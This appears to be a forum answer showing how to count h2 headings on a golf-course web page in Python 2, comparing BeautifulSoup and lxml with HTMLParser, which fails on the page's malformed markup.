You'd have to implement a bunch of handlers in your City2Parser to handle the mess of tags and javascript that HTMLParser doesn't seem to take care of out of the box. Why don't you instead use something like BeautifulSoup:

from BeautifulSoup import BeautifulSoup
import urllib2

page = urllib2.urlopen('http://www.worldgolf.com/courses/usa/massachusetts/')
soup = BeautifulSoup(page)

s = soup.findAll('h2')
print len(s)
for t in s:
    print t.text

gives:

3
Featured Massachusetts Golf Course
Golf Locations
Latest user ratings for Massachusetts golf courses

Unless the point is to use HTMLParser.
Look at what happens:

>>> from HTMLParser import HTMLParser
>>> import urllib2
>>> class City2Parser(HTMLParser):
...     def handle_starttag(self,tag,attrs):
...         if tag == 'h2':
...             print 'h2'
...
>>> req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/')
>>> html = urllib2.urlopen(req)
>>> parser = City2Parser()
>>> parser.feed(html.read())
h2
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/HTMLParser.py", line 109, in feed
    self.goahead(0)
  File "/usr/lib/python2.7/HTMLParser.py", line 151, in goahead
    k = self.parse_starttag(i)
  File "/usr/lib/python2.7/HTMLParser.py", line 232, in parse_starttag
    endpos = self.check_for_whole_start_tag(i)
  File "/usr/lib/python2.7/HTMLParser.py", line 307, in check_for_whole_start_tag
    self.error("malformed start tag")
  File "/usr/lib/python2.7/HTMLParser.py", line 116, in error
    raise HTMLParseError(message, self.getpos())
HTMLParser.HTMLParseError: malformed start tag, at line 249, column 30

It's complaining about the invalid HTML <br style="clear:left;". HTMLParser cares about getting valid HTML.
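If strict parsing is not a requirement, a parser that recovers from malformed markup can still count the headings. This is a sketch using lxml.html as an alternative, following the thread's Python 2/urllib2 setup; it is not part of either answer.

import urllib2
import lxml.html

# lxml's HTML parser recovers from malformed markup instead of raising an error
page = urllib2.urlopen('http://www.worldgolf.com/courses/usa/massachusetts/').read()
root = lxml.html.fromstring(page)
headings = root.xpath('//h2')
print len(headings)
for h in headings:
    print h.text_content().strip()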